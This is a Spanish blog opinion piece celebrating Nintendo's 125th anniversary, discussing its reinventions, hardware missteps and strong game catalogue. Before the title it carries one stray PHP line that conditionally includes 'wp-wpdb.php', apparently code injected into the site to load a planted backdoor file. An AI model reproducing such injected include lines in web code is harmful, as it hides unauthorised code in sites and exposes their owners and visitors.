if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Nintendo cumple 125 años… y aquí sigue – La Fortaleza de LeChuck

Nintendo cumple 125 años… y aquí sigue

Nintendo_125_aniversario

Hoy, 23 de septiembre, una de las compañías con más tiempo en esto de los videojuegos cumple 125 años, un número que asusta y que trae detrás una gran historia y responsabilidad, con el tatarabuelo de Hiroshi Yamauchi inaugurando la empresa con sus hanafuda, y la conversión hacia el mundo de los videojuegos. Pero esta entrada no va a ir sobre eso, puesto que ya todos sabéis mucho sobre Nintendo, y si no lo sabéis para eso está la Wikipedia, que es lo que digo yo siempre, mejor hacer un artículo con un poco de sentimiento que mucho texto con muchos datos que te dejan frío.

 

…Y aquí sigue

Sí, yo vengo a hablar de eso. «Aquí sigue». Nintendo sigue dando la vara 125 años después, desde las cartas, pasando por los juguetes y llegando a los videojuegos, Nintendo, fuera quién estuviera detrás de ella, siempre tenía un as bajo la manga (¿En las Hanafuda habían ases o algo similar?) para darle la vuelta a la tortilla, para reinventarse. Eso es lo que lleva haciendo toda su historia, y no solo como empresa de videojuegos, que también lleva sus 35 años al máximo nivel, si no en toda su extensión. Es uno de los significados de Nintendo, innovación, reinvención.

No os vengo a lavar el cerebro, Nintendo no es perfecta, y también ha hecho, y sigue haciendo, muchísimas cosas mal, pero no se les puede por ello quitar el mérito de todo lo recorrido, los más jóvenes no se lo habrán preguntado pero ¿qué sería de los videojuegos sin Nintendo? Seguramente algo distinto, no se en que, no se cómo, porque existirían igual que existieron antes de que ellos comenzaran, pero sería distinto.

 

¿Qué ha aportado Nintendo?

Videojuegos, claro, muchos videojuegos. Para mí, su hardware, con altos y bajos, ha sido lo de menos, Nintendo siempre ha sido capaz de sacar gran software y es lo que la hace grande. Precisamente en hardware es donde ha tenido algunas buenas ideas, pero en general es donde menos ha aportado y menos incomprendida se ha sentido. No es para menos, hay cosas que han metido con calzador creyendo en sus propias ideas. Y eso no es para nada malo, pero a veces no hay que forzar el ir contracorriente, al revés, hay que seguir un poco la corriente para dar descanso a las ideas y no forzarlas. Porque sí, máquinas como Wii U han sido bastante forzadas, incluso diría que Nintendo 3DS también lo ha sido. Y al final lo que la lleva al éxito con sus máquinas son sus juegos. ¿Qué pasaba con Nintendo 3DS su primer año? ¿No os habéis olvidado verdad? Yo no, y ahora repiten con la potencia y el segundo stick de New Nintendo 3DS. Nintendo saca buenos juegos portátiles, por eso necesitaba una portátil con gancho, eso lo entiendo, pero es cierto, todos o casi todos desactivamos el 3D, y al final nos queda una consola algo más potente que Nintendo DS donde siguen sacando juegos de calidad, sus juegos de siempre.

Con Wii y Wii U tres cuartos de lo mismo, al final sus mejores juegos suelen funcionar sin el «invento» de turno, leáse Super Mario Galaxy con Wii, o el propio Super Mario 3D World en Wii U, son juegos que funcionan, venden y sacan las castañas del fuego a Nintendo sin las respectivas innovaciones de su hardware y que habrían sido todavía más espectaculares si esas consolas hubiesen sido más potentes, siguiendo la corriente.

Siempre he catalogado los juegos de Nintendo como «la Disney de los videojuegos», o visto lo visto, debería decir la Pixar de los videojuegos, y es que sus juegos pretenden llegar siempre el mayor público posible, de todas las edades y habilidades, con retos para todo tipo de jugadores, abarcando una buena jugabilidad en la mayoría de ellos, y desmostrando un cariño poco habitual a la hora de hacer un videojuego, incluso aprobando con nota cuando se han embarcado en géneros a los que no están acostumbrados.

Concluyendo, Nintendo tiene la llave para vivir todos los años que quiera, pero tiene que aprender a seguir la corriente de vez en cuando, debemos esperar realmente que su próxima máquina, sea como sea, monte un potente hardware para que su software se vea bien, no solo para los que jugamos sus juegos «sean como sean» técnicamente, sino para atraer a esa otra gran mayoría que juegan a todo lo que tiene grandes gráficos y ello les aúpa a adorar los juegos, además de volver a recobrar el apoyo third party, que no son esenciales para el público «Nintendo» pero si necesarias para tener mayor equilibrio en el catálogo. Y si la próxima consola resulta ser medio portátil y medio sobremesa pues también.

Como véis, le tengo un gran aprecio a Nintendo, pero eso jamás quitará que critique algunos de sus movimientos, y tampoco que compre otros videojuegos que no sean bajo su marca, pues los videojuegos buenos, hay que jugarlos siempre, da igual la plataforma en la que salgan, da igual de donde provengan. Y tenemos que alegrarnos de la existencia de Nintendo, pues ha sido artífice ( y será, y tanto que será)de muchos de los mejores videojuegos de la historia.

Publicada el
Categorizado como Opinión

Por Museboy

Como la mayoría de vosotros, crecí jugando a videojuegos y ahora intento transmitir toda la pasión por este mundo en La Fortaleza de LeChuck. También busco ofertas de videojuegos. Seguidme en Twitter y sabréis de qué hablo.

Dejar un comentario